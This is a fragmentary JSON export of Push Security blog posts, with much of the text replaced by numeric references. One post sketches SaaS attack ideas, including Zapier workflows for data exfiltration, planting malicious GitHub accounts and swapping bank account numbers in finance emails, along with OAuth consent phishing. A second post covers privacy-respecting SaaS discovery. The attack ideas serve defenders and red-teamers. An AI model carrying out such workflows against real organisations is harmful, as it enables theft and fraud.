",[],{},{"nodeType":186,"data":321542,"content":321543},{"uri":144083},[321544],{"nodeType":173,"value":144086,"marks":321545,"data":321547},[321546],{"type":194},{},{"nodeType":173,"value":208588,"marks":321549,"data":321550},[],{},{"nodeType":178,"data":321552,"content":321553},{},[321554],{"nodeType":173,"value":321555,"marks":321556,"data":321557},"Perhaps the best example here is using a well-known automation app like Zapier, which claims to have more than 5000 integrations. These integrations are often verified, approved, and connected to a trusted vendor (Zapier). An attacker might create workflows to:",[],{},{"nodeType":250,"data":321559,"content":321560},{},[321561,321571,321581],{"nodeType":254,"data":321562,"content":321563},{},[321564],{"nodeType":178,"data":321565,"content":321566},{},[321567],{"nodeType":173,"value":321568,"marks":321569,"data":321570},"do daily data exfiltration from a victim’s data lake",[],{},{"nodeType":254,"data":321572,"content":321573},{},[321574],{"nodeType":178,"data":321575,"content":321576},{},[321577],{"nodeType":173,"value":321578,"marks":321579,"data":321580},"configure a webhook which adds malicious accounts to a github repo on demand",[],{},{"nodeType":254,"data":321582,"content":321583},{},[321584],{"nodeType":178,"data":321585,"content":321586},{},[321587],{"nodeType":173,"value":321588,"marks":321589,"data":321590},"automatically find and replace bank account numbers in emails to the finance team",[],{},{"nodeType":178,"data":321592,"content":321593},{},[321594],{"nodeType":173,"value":208635,"marks":321595,"data":321596},[],{},{"nodeType":178,"data":321598,"content":321599},{},[321600,321603,321610],{"nodeType":173,"value":208642,"marks":321601,"data":321602},[],{},{"nodeType":186,"data":321604,"content":321605},{"uri":59335},[321606],{"nodeType":173,"value":208649,"marks":321607,"data":321609},[321608],{"type":194},{},{"nodeType":173,"value":321611,"marks":321612,"data":321613}," to make another instance of an existing integration - making this backdoor almost impossible to discover.",[],{},{"nodeType":235,"data":321615,"content":321616},{},[321617],{"nodeType":173,"value":208661,"marks":321618,"data":321619},[],{},{"nodeType":178,"data":321621,"content":321622},{},[321623],{"nodeType":173,"value":208668,"marks":321624,"data":321625},[],{},{"nodeType":178,"data":321627,"content":321628},{},[321629,321632,321639,321642,321649],{"nodeType":173,"value":208675,"marks":321630,"data":321631},[],{},{"nodeType":186,"data":321633,"content":321634},{"uri":208680},[321635],{"nodeType":173,"value":208683,"marks":321636,"data":321638},[321637],{"type":194},{},{"nodeType":173,"value":933,"marks":321640,"data":321641},[],{},{"nodeType":186,"data":321643,"content":321644},{"uri":832},[321645],{"nodeType":173,"value":835,"marks":321646,"data":321648},[321647],{"type":194},{},{"nodeType":173,"value":208698,"marks":321650,"data":321651},[],{},{"nodeType":178,"data":321653,"content":321654},{},[321655,321658,321665],{"nodeType":173,"value":208705,"marks":321656,"data":321657},[],{},{"nodeType":186,"data":321659,"content":321660},{"uri":208710},[321661],{"nodeType":173,"value":208713,"marks":321662,"data":321664},[321663],{"type":194},{},{"nodeType":173,"value":208718,"marks":321666,"data":321667},[],{},{"nodeType":178,"data":321669,"content":321670},{},[321671],{"nodeType":173,"value":208725,"marks":321672,"data":321673},[],{},{"nodeType":169,"data":321675,"content":321676},{},[321677],{"nodeType":173,"value":208737,"marks":321678,"data":321679},[],{},{"nodeType":178,"data":321681,"content":321682},{},[321683],{"nodeType":173,"value":321684,"marks":321685,"data":321686},"SaaS apps are basically webapps that are run in the cloud and accessed from endpoints, so then WebApp, endpoint, and cloud security should cover all of SaaS, right? ",[],{},{"nodeType":178,"data":321688,"content":321689},{},[321690],{"nodeType":173,"value":321691,"marks":321692,"data":321693},"That was our assumption when we started, but what we found instead was that SaaS marketing  best practices are driving a lot of pretty interesting techniques that you don’t run into in standalone web apps.",[],{},{"nodeType":235,"data":321695,"content":321696},{},[321697],{"nodeType":173,"value":208758,"marks":321698,"data":321699},[],{},{"nodeType":178,"data":321701,"content":321702},{},[321703],{"nodeType":173,"value":321704,"marks":321705,"data":321706},"Making apps easy to sign-up for and low effort to support means you need to make some interesting choices when it comes to designing account creation and recovery flows. ",[],{},{"nodeType":178,"data":321708,"content":321709},{},[321710],{"nodeType":173,"value":321711,"marks":321712,"data":321713},"Many apps allow users to sign into apps using multiple methods, easily invite collaborators (internal and external) and avoid any additional friction during the sign up process. ",[],{},{"nodeType":178,"data":321715,"content":321716},{},[321717],{"nodeType":173,"value":321718,"marks":321719,"data":321720},"For example, many apps avoid verifying new account email addresses. This is not laziness, these are conscious design choices - not driven by security clearly, but not accidents.",[],{},{"nodeType":235,"data":321722,"content":321723},{},[321724],{"nodeType":173,"value":208786,"marks":321725,"data":321726},[],{},{"nodeType":178,"data":321728,"content":321729},{},[321730],{"nodeType":173,"value":321731,"marks":321732,"data":321733},"Most SaaS apps are trying to build app marketplaces or perform well in other app’s marketplaces (often both) and it’s rare these days to find apps that don’t integrate with other apps. ",[],{},{"nodeType":178,"data":321735,"content":321736},{},[321737],{"nodeType":173,"value":208800,"marks":321738,"data":321739},[],{},{"nodeType":178,"data":321741,"content":321742},{},[321743],{"nodeType":173,"value":208807,"marks":321744,"data":321745},[],{},{"nodeType":169,"data":321747,"content":321748},{},[321749],{"nodeType":173,"value":208814,"marks":321750,"data":321751},[],{},{"nodeType":178,"data":321753,"content":321754},{},[321755,321759,321763],{"nodeType":173,"value":321756,"marks":321757,"data":321758},"This research begs one question above others - ",[],{},{"nodeType":173,"value":208825,"marks":321760,"data":321762},[321761],{"type":1646},{},{"nodeType":173,"value":208830,"marks":321764,"data":321765},[],{},{"nodeType":235,"data":321767,"content":321768},{},[321769],{"nodeType":173,"value":208837,"marks":321770,"data":321771},[],{},{"nodeType":178,"data":321773,"content":321774},{},[321775,321779,321786,321789,321796,321799,321806,321809,321816,321819,321826],{"nodeType":173,"value":321776,"marks":321777,"data":321778},"For some of the better known techniques, like credential stuffing and email phishing, the answer is an easy yes. Stats from ",[],{},{"nodeType":186,"data":321780,"content":321781},{"uri":208849},[321782],{"nodeType":173,"value":208852,"marks":321783,"data":321785},[321784],{"type":194},{},{"nodeType":173,"value":933,"marks":321787,"data":321788},[],{},{"nodeType":186,"data":321790,"content":321791},{"uri":208861},[321792],{"nodeType":173,"value":208864,"marks":321793,"data":321795},[321794],{"type":194},{},{"nodeType":173,"value":208869,"marks":321797,"data":321798},[],{},{"nodeType":186,"data":321800,"content":321801},{"uri":208874},[321802],{"nodeType":173,"value":208877,"marks":321803,"data":321805},[321804],{"type":194},{},{"nodeType":173,"value":73790,"marks":321807,"data":321808},[],{},{"nodeType":186,"data":321810,"content":321811},{"uri":1297},[321812],{"nodeType":173,"value":208888,"marks":321813,"data":321815},[321814],{"type":194},{},{"nodeType":173,"value":208893,"marks":321817,"data":321818},[],{},{"nodeType":186,"data":321820,"content":321821},{"uri":208898},[321822],{"nodeType":173,"value":208901,"marks":321823,"data":321825},[321824],{"type":194},{},{"nodeType":173,"value":208906,"marks":321827,"data":321828},[],{},{"nodeType":178,"data":321830,"content":321831},{},[321832],{"nodeType":173,"value":321833,"marks":321834,"data":321835},"The takeaway is that the current focus for defenders should be to ensure users have good phishing-resistant account security in place - make sure you have basics like strong unique passwords and MFA in place across your entire SaaS estate.",[],{},{"nodeType":235,"data":321837,"content":321838},{},[321839],{"nodeType":173,"value":321840,"marks":321841,"data":321842},"For newer OAuth attacks it’s a lot less clear…",[],{},{"nodeType":178,"data":321844,"content":321845},{},[321846,321850,321855,321858,321865],{"nodeType":173,"value":321847,"marks":321848,"data":321849},"Other techniques like consent phishing, and have been discussed in some breach disclosures like the ",[],{},{"nodeType":173,"value":321851,"marks":321852,"data":321854},"2020 Sans breach",[321853],{"type":194},{},{"nodeType":173,"value":208936,"marks":321856,"data":321857},[],{},{"nodeType":186,"data":321859,"content":321860},{"uri":208941},[321861],{"nodeType":173,"value":208944,"marks":321862,"data":321864},[321863],{"type":194},{},{"nodeType":173,"value":208949,"marks":321866,"data":321867},[],{},{"nodeType":178,"data":321869,"content":321870},{},[321871,321874,321879],{"nodeType":173,"value":208956,"marks":321872,"data":321873},[],{},{"nodeType":173,"value":321875,"marks":321876,"data":321878},"either attackers aren’t yet using them widely or they are and we aren’t detecting them",[321877],{"type":1646},{},{"nodeType":173,"value":1477,"marks":321880,"data":321881},[],{},{"nodeType":178,"data":321883,"content":321884},{},[321885],{"nodeType":173,"value":321886,"marks":321887,"data":321888},"There is certainly a case to be made that attackers simply don’t need these newer techniques yet. Many organizations don’t have a way of discovering SaaS use in their organization yet, nevermind breached accounts, so new persistence techniques might be a bit more than necessary at the moment.",[],{},{"nodeType":235,"data":321890,"content":321891},{},[321892],{"nodeType":173,"value":208978,"marks":321893,"data":321894},[],{},{"nodeType":178,"data":321896,"content":321897},{},[321898],{"nodeType":173,"value":321899,"marks":321900,"data":321901},"On the other hand, there is certainly the possibility that these attacks are increasingly used, but are simply not being discovered. A strong argument in favor of this view is the difficulty in investigating these attacks. Very few SaaS apps provide enough logging capability to discover these attacks as a customer, this is true even for the biggest, most mature apps like Office 365 and Google Workspace unless you are on top license tiers. This is doubly true for attacks that use OAuth, with many apps providing no insight or details into actions made using OAuth-authenticated APIs. ",[],{},{"nodeType":178,"data":321903,"content":321904},{},[321905,321908,321915,321919,321926],{"nodeType":173,"value":208992,"marks":321906,"data":321907},[],{},{"nodeType":186,"data":321909,"content":321910},{"uri":208997},[321911],{"nodeType":173,"value":209000,"marks":321912,"data":321914},[321913],{"type":194},{},{"nodeType":173,"value":321916,"marks":321917,"data":321918}," relied heavily on Github during the investigation (and in one case even the detection of) their 2022 breaches, and the same  seems true for a similar breach affecting ",[],{},{"nodeType":186,"data":321920,"content":321921},{"uri":209010},[321922],{"nodeType":173,"value":209013,"marks":321923,"data":321925},[321924],{"type":194},{},{"nodeType":173,"value":209018,"marks":321927,"data":321928},[],{},{"nodeType":178,"data":321930,"content":321931},{},[321932,321936,321944],{"nodeType":173,"value":321933,"marks":321934,"data":321935},"So, are these attacks happening in the real world? My best guess is it’s a little bit of column A and a little bit of column B – there are likely not so many of these attacks happening yet, and when they do I suspect the vast majority go undetected. ",[],{},{"nodeType":186,"data":321937,"content":321938},{"uri":209030},[321939],{"nodeType":173,"value":209033,"marks":321940,"data":321943},[321941,321942],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":321945,"data":321946},[],{},{"nodeType":178,"data":321948,"content":321949},{},[321950],{"nodeType":173,"value":321951,"marks":321952,"data":321953},"This is part of the reason we think enabling red-teamers to try these techniques in anger is useful - this is the time-proven way to understand these risks.",[],{},{"nodeType":169,"data":321955,"content":321956},{},[321957],{"nodeType":173,"value":209052,"marks":321958,"data":321959},[],{},{"nodeType":178,"data":321961,"content":321962},{},[321963],{"nodeType":173,"value":321964,"marks":321965,"data":321966},"We’ve barely scratched the surface, but perhaps there is enough here to get the discussion going. From past experience, discussion may not be enough, and it’s likely that live offensive work like penetration tests or more likely red-team exercises will be required to make the risks of using these techniques real for the wider security community. ",[],{},{"nodeType":178,"data":321968,"content":321969},{},[321970],{"nodeType":173,"value":321971,"marks":321972,"data":321973},"After all, seeing is believing. We think some more practical examples and tools to help red- teamers use these techniques on engagements will help drive awareness forward so we’ll be looking to build out this content.",[],{},{"nodeType":178,"data":321975,"content":321976},{},[321977,321980,321988],{"nodeType":173,"value":209073,"marks":321978,"data":321979},[],{},{"nodeType":186,"data":321981,"content":321982},{"uri":209078},[321983],{"nodeType":173,"value":321984,"marks":321985,"data":321987},"backdoored github repo to get code execution on endpoints",[321986],{"type":194},{},{"nodeType":173,"value":1477,"marks":321989,"data":321990},[],{},{"nodeType":178,"data":321992,"content":321993},{},[321994,321998,322005],{"nodeType":173,"value":321995,"marks":321996,"data":321997},"Help us all better understand how widespread these attacks are by sharing some war stories - blueteams, have you seen these attacks in IR investigations? Red-teamers, have tried these or similar techniques against SaaS? Even better, we’d love some comments, discussions, or PRs on ",[],{},{"nodeType":186,"data":321999,"content":322000},{"uri":88239},[322001],{"nodeType":173,"value":197982,"marks":322002,"data":322004},[322003],{"type":194},{},{"nodeType":173,"value":197986,"marks":322006,"data":322007},[],{},{"entries":322009},{"hyperlink":322010,"block":322011,"inline":322012},[],[],[],{"items":322014},[322015,322017],{"sys":322016,"name":274157},{"id":274156},{"sys":322018,"name":26137},{"id":26136},{"items":322020},[322021,322343],{"__typename":1528,"sys":322022,"content":322024,"title":322329,"synopsis":322330,"hashTags":118,"publishedDate":322331,"slug":322332,"tagsCollection":322333,"authorsCollection":322339},{"id":322023},"2cLFeaDTWWdZ8G8U12qmiZ",{"json":322025},{"data":322026,"content":322027,"nodeType":165},{},[322028,322035,322042,322049,322056,322063,322070,322077,322084,322091,322098,322105,322129,322148,322155,322162,322169,322232,322252,322269,322276,322283,322290,322296,322303,322310],{"data":322029,"content":322030,"nodeType":169},{},[322031],{"data":322032,"marks":322033,"value":322034,"nodeType":173},{},[],"Prevention isn’t always the answer",{"data":322036,"content":322037,"nodeType":178},{},[322038],{"data":322039,"marks":322040,"value":322041,"nodeType":173},{},[],"As a security team, our job is to help our company achieve its goals by taking risks securely. Simply using a computer represents a risk over the more traditional pen and paper, but the productivity gains clearly outweigh the risk; so the security team ensures the business takes that risk securely. Outright prevention - i.e. not using a computer - in this case, makes no sense.",{"data":322043,"content":322044,"nodeType":178},{},[322045],{"data":322046,"marks":322047,"value":322048,"nodeType":173},{},[],"Of course, within how the computer operates we might choose to prevent some functionality in the name of security, but the principle remains the same - prevention usually requires a trade-off against productivity.",{"data":322050,"content":322051,"nodeType":169},{},[322052],{"data":322053,"marks":322054,"value":322055,"nodeType":173},{},[],"Detection, but at the cost of privacy",{"data":322057,"content":322058,"nodeType":178},{},[322059],{"data":322060,"marks":322061,"value":322062,"nodeType":173},{},[],"When a base level of security became more common (through better awareness, accessible knowledge, and sensible vendor defaults), attackers shifted to using techniques that couldn’t be prevented because the business relied on the underlying tools - a malicious Word doc, a sneaky PowerShell script, a dodgy PDF.",{"data":322064,"content":322065,"nodeType":178},{},[322066],{"data":322067,"marks":322068,"value":322069,"nodeType":173},{},[],"Now prevention wasn’t an option, the security team had to monitor usage for malicious activity. But monitoring comes at a cost. To detect when malicious activity happens, the security team needs to monitor all activity, including legitimate activity. So, while a detection approach doesn’t restrict what a user can do, it comes at the cost of their privacy.",{"data":322071,"content":322072,"nodeType":169},{},[322073],{"data":322074,"marks":322075,"value":322076,"nodeType":173},{},[],"Building trust with your users",{"data":322078,"content":322079,"nodeType":178},{},[322080],{"data":322081,"marks":322082,"value":322083,"nodeType":173},{},[],"In either case, when introducing security controls you should aim to justify and explain this decision to your users, remembering that security’s job is to help them do their jobs securely - it shouldn’t be for them to figure out how to do their jobs within the confines of what the security team has decided is OK. A security team should be more like the secret service, than the prison service.",{"data":322085,"content":322086,"nodeType":178},{},[322087],{"data":322088,"marks":322089,"value":322090,"nodeType":173},{},[],"Although, of course, many employees won’t have much interest in the motivations of their IT/security team, maintaining this attitude will help you build and keep trust with them. With trust in hand, employees will be less likely to try to work around your controls.",{"data":322092,"content":322093,"nodeType":169},{},[322094],{"data":322095,"marks":322096,"value":322097,"nodeType":173},{},[],"SaaS - the new frontier",{"data":322099,"content":322100,"nodeType":178},{},[322101],{"data":322102,"marks":322103,"value":322104,"nodeType":173},{},[],"In recent years, our computers are mostly just windows to the Internet - many users access their email, video conferencing, productivity suites and more via their browser (or Electron apps pretending they aren’t browsers).",{"data":322106,"content":322107,"nodeType":178},{},[322108,322112,322117,322121,322125],{"data":322109,"marks":322110,"value":322111,"nodeType":173},{},[],"And, as is often the way, we’re relearning the same lessons as before. Should employees be ",{"data":322113,"marks":322114,"value":322116,"nodeType":173},{},[322115],{"type":1646},"allowed",{"data":322118,"marks":322119,"value":322120,"nodeType":173},{},[]," to sign up for and use arbitrary SaaS platforms? Should employees be ",{"data":322122,"marks":322123,"value":322116,"nodeType":173},{},[322124],{"type":1646},{"data":322126,"marks":322127,"value":322128,"nodeType":173},{},[]," to add arbitrary apps into Microsoft 365, Google Workspace, or other SaaS platforms?",{"data":322130,"content":322131,"nodeType":178},{},[322132,322136,322144],{"data":322133,"marks":322134,"value":322135,"nodeType":173},{},[],"Regardless of your answer, your coworkers have already spoken and it’s almost certainly already happening. A ",{"data":322137,"content":322138,"nodeType":186},{"uri":296916},[322139],{"data":322140,"marks":322141,"value":322143,"nodeType":173},{},[322142],{"type":194},"report from G2",{"data":322145,"marks":322146,"value":322147,"nodeType":173},{},[]," stated that 80% of workers admit to using SaaS applications at work without getting approval from IT. If you want to enable your colleagues’ productivity, prevention, it would seem, isn’t an option.",{"data":322149,"content":322150,"nodeType":169},{},[322151],{"data":322152,"marks":322153,"value":322154,"nodeType":173},{},[],"The risks of SaaS",{"data":322156,"content":322157,"nodeType":178},{},[322158],{"data":322159,"marks":322160,"value":322161,"nodeType":173},{},[],"So how do we secure the company in this new way of working? We still have plenty to consider.",{"data":322163,"content":322164,"nodeType":178},{},[322165],{"data":322166,"marks":322167,"value":322168,"nodeType":173},{},[],"We can start thinking about SaaS not just as an allow or not to allow, but taking a more flexible and pragmatic approach, asking questions like::",{"data":322170,"content":322171,"nodeType":250},{},[322172,322182,322192,322202,322212,322222],{"data":322173,"content":322174,"nodeType":254},{},[322175],{"data":322176,"content":322177,"nodeType":178},{},[322178],{"data":322179,"marks":322180,"value":322181,"nodeType":173},{},[],"What kind of data users are entering into these third-party platforms?",{"data":322183,"content":322184,"nodeType":254},{},[322185],{"data":322186,"content":322187,"nodeType":178},{},[322188],{"data":322189,"marks":322190,"value":322191,"nodeType":173},{},[],"How much do we trust the controls the third-party has in place?",{"data":322193,"content":322194,"nodeType":254},{},[322195],{"data":322196,"content":322197,"nodeType":178},{},[322198],{"data":322199,"marks":322200,"value":322201,"nodeType":173},{},[],"Are those controls appropriate for the data? ",{"data":322203,"content":322204,"nodeType":254},{},[322205],{"data":322206,"content":322207,"nodeType":178},{},[322208],{"data":322209,"marks":322210,"value":322211,"nodeType":173},{},[],"Is this platform redundant with the other services we use (e.g. “we use Google Drive, not Dropbox”)? ",{"data":322213,"content":322214,"nodeType":254},{},[322215],{"data":322216,"content":322217,"nodeType":178},{},[322218],{"data":322219,"marks":322220,"value":322221,"nodeType":173},{},[],"Does IT or security need to manage accounts for joiners/leavers?",{"data":322223,"content":322224,"nodeType":254},{},[322225],{"data":322226,"content":322227,"nodeType":178},{},[322228],{"data":322229,"marks":322230,"value":322231,"nodeType":173},{},[],"Does this platform impact our compliance? (e.g. does storing this data on this platform compromise our GDPR status?)",{"data":322233,"content":322234,"nodeType":178},{},[322235,322239,322248],{"data":322236,"marks":322237,"value":322238,"nodeType":173},{},[],"No one said it would be easy 🙃 and it’s easy to see why many organizations initially opt to simply try to block users from using such systems. Assessing each application can be daunting using traditional third-party security assessment techniques - we’ve written a ",{"data":322240,"content":322243,"nodeType":1698},{"target":322241},{"sys":322242},{"id":283466,"type":317,"linkType":318},[322244],{"data":322245,"marks":322246,"value":322247,"nodeType":173},{},[],"short guide",{"data":322249,"marks":322250,"value":322251,"nodeType":173},{},[]," on how to approach security auditing in a world of SaaS, which you might find useful.",{"data":322253,"content":322254,"nodeType":178},{},[322255,322259,322265],{"data":322256,"marks":322257,"value":322258,"nodeType":173},{},[],"But the first step in managing this new world is through visibility. Knowing the problem is half the battle and we published ",{"data":322260,"content":322261,"nodeType":186},{"uri":296864},[322262],{"data":322263,"marks":322264,"value":287472,"nodeType":173},{},[],{"data":322266,"marks":322267,"value":322268,"nodeType":173},{},[]," about how to manually find the SaaS apps your employees are using. The problem is, a lot of them are either error-prone or quite invasive, potentially collecting your users private activity. In the trade-off of security versus privacy, we think that’s a bit too far and will likely damage the trust you’ve built with your coworkers.",{"data":322270,"content":322271,"nodeType":169},{},[322272],{"data":322273,"marks":322274,"value":322275,"nodeType":173},{},[],"Monitoring SaaS use without compromising privacy",{"data":322277,"content":322278,"nodeType":178},{},[322279],{"data":322280,"marks":322281,"value":322282,"nodeType":173},{},[],"Our approach at Push is to deploy our browser extension to our users’ browsers which is configured with the domains we use for work (e.g. @pushsecurity.com). The browser extension only monitors logins where an @pushsecurity.com email address is used, which we can reasonably assume means the platform is being used for work reasons.",{"data":322284,"content":322285,"nodeType":178},{},[322286],{"data":322287,"marks":322288,"value":322289,"nodeType":173},{},[],"We share this with employees up front during the onboarding process and, if you click on the browser extension, it also lets you know which domains it’s monitoring:",{"data":322291,"content":322295,"nodeType":312},{"target":322292},{"sys":322293},{"id":322294,"type":317,"linkType":318},"6z1apzuDIaXXN7xIAHEUku",[],{"data":322297,"content":322298,"nodeType":178},{},[322299],{"data":322300,"marks":322301,"value":322302,"nodeType":173},{},[],"This helps our users understand why we are monitoring which SaaS they’re using which in turn makes them aware of the risk we are managing and why.",{"data":322304,"content":322305,"nodeType":178},{},[322306],{"data":322307,"marks":322308,"value":322309,"nodeType":173},{},[],"With this approach we’ve built a comprehensive picture of which SaaS platforms our team is using which has helped us understand where our data lives and which platforms need extra attention to ensure we have all the right controls in place. When our users use a new platform we can reach out to them at the start of their journey to understand what they’re trying to achieve and how we can help them do it securely.",{"data":322311,"content":322312,"nodeType":178},{},[322313,322316,322325],{"data":322314,"marks":322315,"value":37,"nodeType":173},{},[],{"data":322317,"content":322319,"nodeType":186},{"uri":322318},"https://pushsecurity.com/features/saas-discovery",[322320],{"data":322321,"marks":322322,"value":322324,"nodeType":173},{},[322323],{"type":194},"Learn more about how Push can discover SaaS apps your employees are using",{"data":322326,"marks":322327,"value":322328,"nodeType":173},{},[]," without compromising their privacy. ","How to discover SaaS use without invading employee privacy","Learn how to manage SaaS in a way that keeps employees productive and doesn't compromise privacy.","2022-08-22T00:00:00.000Z","how-to-discover-saas-use-without-invading-employee-privacy",{"items":322334},[322335,322337],{"sys":322336,"name":274157},{"id":274156},{"sys":322338,"name":26133},{"id":26132},{"items":322340},[322341],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":322342},{"url":19129},{"__typename":1528,"sys":322344,"content":322345,"title":294049,"synopsis":294050,"hashTags":118,"publishedDate":294051,"slug":294052,"tagsCollection":322627,"authorsCollection":322633},{"id":293723},{"json":322346},{"data":322347,"content":322348,"nodeType":165},{},[322349,322355,322372,322378,322384,322390,322396,322402,322408,322414,322420,322426,322432,322438,322444,322457,322463,322469,322475,322481,322487,322493,322508,322514,322520,322526,322532,322538,322545,322575,322582,322612],{"data":322350,"content":322351,"nodeType":178},{},[322352],{"data":322353,"marks":322354,"value":293734,"nodeType":173},{},[],{"data":322356,"content":322357,"nodeType":178},{},[322358,322361,322369],{"data":322359,"marks":322360,"value":293741,"nodeType":173},{},[],{"data":322362,"content":322365,"nodeType":1698},{"target":322363},{"sys":322364},{"id":282056,"type":317,"linkType":318},[322366],{"data":322367,"marks":322368,"value":247581,"nodeType":173},{},[],{"data":322370,"marks":322371,"value":293753,"nodeType":173},{},[],{"data":322373,"content":322374,"nodeType":178},{},[322375],{"data":322376,"marks":322377,"value":293760,"nodeType":173},{},[],{"data":322379,"content":322380,"nodeType":178},{},[322381],{"data":322382,"marks":322383,"value":293767,"nodeType":173},{},[],{"data":322385,"content":322386,"nodeType":178},{},[322387],{"data":322388,"marks":322389,"value":293774,"nodeType":173},{},[],{"data":322391,"content":322392,"nodeType":178},{},[322393],{"data":322394,"marks":322395,"value":293781,"nodeType":173},{},[],{"data":322397,"content":322398,"nodeType":235},{},[322399],{"data":322400,"marks":322401,"value":293788,"nodeType":173},{},[],{"data":322403,"content":322404,"nodeType":178},{},[322405],{"data":322406,"marks":322407,"value":293795,"nodeType":173},{},[],{"data":322409,"content":322410,"nodeType":178},{},[322411],{"data":322412,"marks":322413,"value":293802,"nodeType":173},{},[],{"data":322415,"content":322416,"nodeType":178},{},[322417],{"data":322418,"marks":322419,"value":293809,"nodeType":173},{},[],{"data":322421,"content":322422,"nodeType":178},{},[322423],{"data":322424,"marks":322425,"value":293816,"nodeType":173},{},[],{"data":322427,"content":322428,"nodeType":235},{},[322429],{"data":322430,"marks":322431,"value":293823,"nodeType":173},{},[],{"data":322433,"content":322434,"nodeType":178},{},[322435],{"data":322436,"marks":322437,"value":293830,"nodeType":173},{},[],{"data":322439,"content":322440,"nodeType":178},{},[322441],{"data":322442,"marks":322443,"value":293837,"nodeType":173},{},[],{"data":322445,"content":322446,"nodeType":178},{},[322447,322450,322454],{"data":322448,"marks":322449,"value":293844,"nodeType":173},{},[],{"data":322451,"marks":322452,"value":293849,"nodeType":173},{},[322453],{"type":1646},{"data":322455,"marks":322456,"value":293853,"nodeType":173},{},[],{"data":322458,"content":322459,"nodeType":178},{},[322460],{"data":322461,"marks":322462,"value":293860,"nodeType":173},{},[],{"data":322464,"content":322465,"nodeType":235},{},[322466],{"data":322467,"marks":322468,"value":293867,"nodeType":173},{},[],{"data":322470,"content":322471,"nodeType":178},{},[322472],{"data":322473,"marks":322474,"value":293874,"nodeType":173},{},[],{"data":322476,"content":322477,"nodeType":178},{},[322478],{"data":322479,"marks":322480,"value":293881,"nodeType":173},{},[],{"data":322482,"content":322483,"nodeType":178},{},[322484],{"data":322485,"marks":322486,"value":293888,"nodeType":173},{},[],{"data":322488,"content":322489,"nodeType":178},{},[322490],{"data":322491,"marks":322492,"value":293895,"nodeType":173},{},[],{"data":322494,"content":322495,"nodeType":178},{},[322496,322499,322505],{"data":322497,"marks":322498,"value":293902,"nodeType":173},{},[],{"data":322500,"content":322501,"nodeType":186},{"uri":293905},[322502],{"data":322503,"marks":322504,"value":293910,"nodeType":173},{},[],{"data":322506,"marks":322507,"value":197,"nodeType":173},{},[],{"data":322509,"content":322510,"nodeType":235},{},[322511],{"data":322512,"marks":322513,"value":293920,"nodeType":173},{},[],{"data":322515,"content":322516,"nodeType":178},{},[322517],{"data":322518,"marks":322519,"value":293927,"nodeType":173},{},[],{"data":322521,"content":322522,"nodeType":178},{},[322523],{"data":322524,"marks":322525,"value":293934,"nodeType":173},{},[],{"data":322527,"content":322528,"nodeType":235},{},[322529],{"data":322530,"marks":322531,"value":40632,"nodeType":173},{},[],{"data":322533,"content":322534,"nodeType":178},{},[322535],{"data":322536,"marks":322537,"value":293947,"nodeType":173},{},[],{"data":322539,"content":322540,"nodeType":178},{},[322541],{"data":322542,"marks":322543,"value":293955,"nodeType":173},{},[322544],{"type":370},{"data":322546,"content":322547,"nodeType":250},{},[322548,322557,322566],{"data":322549,"content":322550,"nodeType":254},{},[322551],{"data":322552,"content":322553,"nodeType":178},{},[322554],{"data":322555,"marks":322556,"value":293968,"nodeType":173},{},[],{"data":322558,"content":322559,"nodeType":254},{},[322560],{"data":322561,"content":322562,"nodeType":178},{},[322563],{"data":322564,"marks":322565,"value":293978,"nodeType":173},{},[],{"data":322567,"content":322568,"nodeType":254},{},[322569],{"data":322570,"content":322571,"nodeType":178},{},[322572],{"data":322573,"marks":322574,"value":293988,"nodeType":173},{},[],{"data":322576,"content":322577,"nodeType":178},{},[322578],{"data":322579,"marks":322580,"value":293996,"nodeType":173},{},[322581],{"type":370},{"data":322583,"content":322584,"nodeType":250},{},[322585,322594,322603],{"data":322586,"content":322587,"nodeType":254},{},[322588],{"data":322589,"content":322590,"nodeType":178},{},[322591],{"data":322592,"marks":322593,"value":294009,"nodeType":173},{},[],{"data":322595,"content":322596,"nodeType":254},{},[322597],{"data":322598,"content":322599,"nodeType":178},{},[322600],{"data":322601,"marks":322602,"value":294019,"nodeType":173},{},[],{"data":322604,"content":322605,"nodeType":254},{},[322606],{"data":322607,"content":322608,"nodeType":178},{},[322609],{"data":322610,"marks":322611,"value":294029,"nodeType":173},{},[],{"data":322613,"content":322614,"nodeType":178},{},[322615,322618,322624],{"data":322616,"marks":322617,"value":294036,"nodeType":173},{},[],{"data":322619,"content":322620,"nodeType":186},{"uri":294039},[322621],{"data":322622,"marks":322623,"value":294044,"nodeType":173},{},[],{"data":322625,"marks":322626,"value":294048,"nodeType":173},{},[],{"items":322628},[322629,322631],{"sys":322630,"name":274157},{"id":274156},{"sys":322632,"name":26133},{"id":26132},{"items":322634},[322635],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":322636},{"url":13981},{"items":322638},[322639],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":322640},{"url":273636},"content:blog:embrace-saas-to-move-faster-than-your-competitors.json","blog/embrace-saas-to-move-faster-than-your-competitors.json","blog/embrace-saas-to-move-faster-than-your-competitors",{"_path":322645,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":322646,"ogImage":118,"summary":322649,"title":322660,"subtitle":118,"metaTitle":322661,"synopsis":322659,"hashTags":118,"publishedDate":322662,"slug":322663,"tagsCollection":322664,"content":322668,"relatedBlogPostsCollection":323029,"authorsCollection":323574,"_id":323582,"_type":5439,"_source":5440,"_file":323583,"_stem":323584,"_extension":5439},"/blog/push-it-real-good-why-im-excited-to-join-pushs-board",{"id":322647,"publishedAt":322648},"1bkW8uoCL6lLeHbAkndZUM","2024-03-21T09:24:28.123Z",{"json":322650},{"data":322651,"content":322652,"nodeType":165},{},[322653],{"data":322654,"content":322655,"nodeType":178},{},[322656],{"data":322657,"marks":322658,"value":322659,"nodeType":173},{},[],"SaaS sprawl is not just a raw increase of apps in-use, but also due to employees self-adopting new apps. Orgs need sensible guardrails for employees.","Push it real good: Why I’m excited to join Push’s board","Jon Oberheide Joins Push Security's Board","2023-04-17T00:00:00.000Z","push-it-real-good-why-im-excited-to-join-pushs-board",{"items":322665},[322666],{"sys":322667,"name":117242},{"id":117241},{"json":322669,"links":323020},{"data":322670,"content":322671,"nodeType":165},{},[322672,322705,322752,322809,322816,322836,322843,322863,322870,322877,322884,322891,322898,322931,322959,322966,322973,322980,323000],{"data":322673,"content":322674,"nodeType":178},{},[322675,322679,322688,322692,322701],{"data":322676,"marks":322677,"value":322678,"nodeType":173},{},[],"Software has been eating the world for the past decade. And boy, it turns out that software is still SUPER hungry (like, 